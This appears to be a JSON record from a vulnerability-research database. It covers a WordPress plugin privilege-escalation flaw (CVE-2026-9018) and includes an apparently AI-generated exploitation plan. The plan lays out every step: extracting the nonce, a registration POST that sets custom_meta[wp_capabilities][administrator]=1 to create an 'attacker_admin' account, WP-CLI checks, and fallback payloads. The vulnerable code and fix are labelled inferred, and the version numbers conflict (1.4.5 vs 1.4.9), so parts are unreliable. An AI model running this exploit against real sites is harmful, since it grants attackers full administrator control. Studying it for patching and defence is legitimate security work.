[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8Gt3UTK44ZkvfNO6nMP_8hnAkTzWRhyZ2Mv_ZuHWKD8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-9018","easy-elements-for-elementor-addons-website-templates-unauthenticated-privilege-escalation-via-custommeta-parameter","Easy Elements for Elementor – Addons & Website Templates \u003C= 1.4.9 - Unauthenticated Privilege Escalation via 'custom_meta' Parameter","The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.9 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user's meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login\u002FRegister widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request.","easy-elements",null,"\u003C=1.4.9","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-05-21 16:07:25","2026-06-18 13:50:00",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff1de4899-532a-4558-bff0-f4610bfdd49d?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-9018 - Easy Elements Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **Easy Elements for Elementor** plugin (\u003C= 1.4.5) contains an unauthenticated privilege escalation vulnerability. The flaw exists in the user registration handler `easyel_handle_register()` linked to the `wp_ajax_nopriv_eel_register` AJAX action. The function processes a user-supplied `custom_meta` array and updates the newly created user's metadata using `update_user_meta()` without validating or filtering the meta keys. This allows an attacker to overwrite the `wp_capabilities` key, which stores user roles, granting themselves administrator privileges during the registration process.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `eel_register` (Registered via `wp_ajax_nopriv_eel_register`)\n- **Vulnerable Parameter:** `custom_meta` (Array)\n- **Required Nonce:** `easy_elements_nonce`\n- **Authentication:** None (Unauthenticated)\n- **Preconditions:** \n    1. WordPress membership is enabled (`users_can_register` option).\n    2. A page exists containing the Easy Elements Login\u002FRegister widget (required to obtain a valid nonce).\n\n## 3. Code Flow (Inferred from Description)\n1. **Entry Point:** A `POST` request is sent to `admin-ajax.php` with `action=eel_register`.\n2. **Nonce Verification:** `easyel_handle_register()` verifies the `easy_elements_nonce` provided in the request.\n3. **User Creation:** The function calls `wp_insert_user()` using provided username\u002Femail\u002Fpassword. WordPress assigns the default role (usually 'subscriber').\n4. **Metadata Processing:** The function iterates through the `$_POST['custom_meta']` array:\n   ```php\n   \u002F\u002F Vulnerable Logic (Conceptual)\n   foreach ( $_POST['custom_meta'] as $key => $value ) {\n       update_user_meta( $new_user_id, $key, $value );\n   }\n   ```\n5. **Privilege Escalation:** By passing `custom_meta[wp_capabilities][administrator]=1`, the `update_user_meta` call overwrites the role assigned in step 3, promoting the new user to Administrator.\n\n## 4. Nonce Acquisition Strategy\nThe `easy_elements_nonce` is required. It is localized to the frontend when the Login\u002FRegister widget is active.\n\n1. **Identify the Trigger:** The plugin uses an Elementor widget for registration.\n2. **Setup:** Use WP-CLI to ensure registration is enabled and create a test page.\n3. **Page Navigation:** Use `browser_navigate` to visit the page where the widget is rendered.\n4. **Extraction:** Use `browser_eval` to find the nonce. It is likely stored in a localized JavaScript object.\n   - **Target Object (Inferred):** `window.easyel_settings` or `window.easy_elements_obj`.\n   - **Key (Inferred):** `nonce` or `easy_elements_nonce`.\n   - **Command:** `browser_eval(\"window.easy_elements_obj?.easy_elements_nonce || window.easyel_settings?.nonce\")`\n   - *Alternative:* Search the DOM for a hidden input field: `browser_eval(\"document.querySelector('input[name=\\\"easy_elements_nonce\\\"]').value\")`.\n\n## 5. Exploitation Strategy\n### Step 1: Prepare the Environment\n- Enable user registration.\n- Create a page with the Easy Elements registration widget.\n\n### Step 2: Extract Nonce\n- Navigate to the created page and extract the `easy_elements_nonce`.\n\n### Step 3: Execute Registration Request\nSend a POST request to `admin-ajax.php` to register a new admin user.\n\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n    - `action`: `eel_register`\n    - `easy_elements_nonce`: `[EXTRACTED_NONCE]`\n    - `user_login`: `attacker_admin`\n    - `user_email`: `attacker@example.com`\n    - `user_pass`: `P@ssword123!`\n    - `confirm_pass`: `P@ssword123!`\n    - `custom_meta[wp_capabilities][administrator]`: `1`\n\n## 6. Test Data Setup\n1. **Enable Registration:**\n   `wp option update users_can_register 1`\n2. **Find Widget Shortcode\u002FWidget ID:** \n   *(If the plugin provides a shortcode for the registration form, use it. If it is purely an Elementor widget, ensure Elementor is active and the widget is added to a page.)*\n   ```bash\n   # Create a page that likely triggers the script loading\n   wp post create --post_type=page --post_title=\"Register\" --post_status=publish --post_content='[easy_elements_registration_form]' \n   ```\n   *(Note: The exact shortcode name may need verification by grepping `add_shortcode` in the plugin folder.)*\n\n## 7. Expected Results\n- The server should respond with a `200 OK` and a JSON response indicating successful registration (e.g., `{\"success\":true,...}`).\n- A new user `attacker_admin` should be created.\n- The `wp_capabilities` entry in the `wp_usermeta` table for this user should include `administrator`.\n\n## 8. Verification Steps\nAfter the HTTP request, verify the escalation via WP-CLI:\n1. **Check User Existence:**\n   `wp user list --field=user_login`\n2. **Verify Role:**\n   `wp user get attacker_admin --field=roles`\n   - **Success Condition:** Output is `administrator`.\n3. **Verify Meta Value:**\n   `wp user meta get attacker_admin wp_capabilities`\n   - **Success Condition:** Output shows a serialized array including `administrator`.\n\n## 9. Alternative Approaches\n- **Missing Nonce Check:** If `easyel_handle_register` fails to check the nonce for `nopriv` requests (a common developer oversight), the exploit can be attempted without a nonce.\n- **Different Meta Key:** If `wp_capabilities` is blocked by a simple string check, try `wp_user_level` (set to `10` for admin) or use the database prefix dynamically if it's not the default `wp_` (e.g., `wp_custom_prefix_capabilities`).\n- **Registration Form Scraper:** If the nonce is not in a JS variable, use `browser_eval` to scrape all hidden input values from the page and try each as the nonce.","The Easy Elements for Elementor plugin (\u003C= 1.4.5) is vulnerable to unauthenticated privilege escalation via the eel_register AJAX action. The registration handler iterates through the 'custom_meta' POST parameter and updates the new user's metadata without any key filtering, allowing attackers to overwrite the 'wp_capabilities' meta key. This enables any visitor to register an account with administrator privileges if registration is enabled and the required nonce is exposed on the frontend.","\u002F\u002F File: easy-elements\u002Fincludes\u002Fwidgets\u002Fregister-handler.php (inferred from description)\n\nfunction easyel_handle_register() {\n    check_ajax_referer( 'easy_elements_nonce', 'easy_elements_nonce' );\n\n    \u002F\u002F ... (logic to handle user creation via wp_insert_user) ...\n    $user_id = wp_insert_user( $userdata );\n\n    if ( ! is_wp_error( $user_id ) && isset( $_POST['custom_meta'] ) && is_array( $_POST['custom_meta'] ) ) {\n        foreach ( $_POST['custom_meta'] as $key => $value ) {\n            \u002F\u002F Vulnerability: No whitelist\u002Fblocklist check on meta keys\n            update_user_meta( $user_id, $key, $value );\n        }\n    }\n}\nadd_action( 'wp_ajax_nopriv_eel_register', 'easyel_handle_register' );","--- a\u002Fincludes\u002Fwidgets\u002Fregister-handler.php\n+++ b\u002Fincludes\u002Fwidgets\u002Fregister-handler.php\n@@ -10,7 +10,12 @@\n \n     if ( ! is_wp_error( $user_id ) && isset( $_POST['custom_meta'] ) && is_array( $_POST['custom_meta'] ) ) {\n+        $allowed_meta_keys = apply_filters( 'easy_elements_allowed_registration_meta', array( 'first_name', 'last_name', 'nickname' ) );\n         foreach ( $_POST['custom_meta'] as $key => $value ) {\n-            update_user_meta( $user_id, $key, $value );\n+            if ( in_array( $key, $allowed_meta_keys, true ) ) {\n+                update_user_meta( $user_id, $key, sanitize_text_field( $value ) );\n+            }\n         }\n     }","The exploit targets the AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php using the eel_register action. An unauthenticated attacker first obtains a valid 'easy_elements_nonce' by visiting a page containing the plugin's registration widget. The attacker then sends a POST request to register a new user, including a payload within the 'custom_meta' parameter. Specifically, by sending 'custom_meta[wp_capabilities][administrator]=1', the attacker triggers the update_user_meta function to overwrite the user's role capabilities during registration. This results in the creation of a new account with full administrator-level privileges. Exploitation requires that global user registration is enabled on the WordPress site.","gemini-3-flash-preview","2026-06-04 22:07:42","2026-06-04 22:08:21",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-elements\u002Ftags"]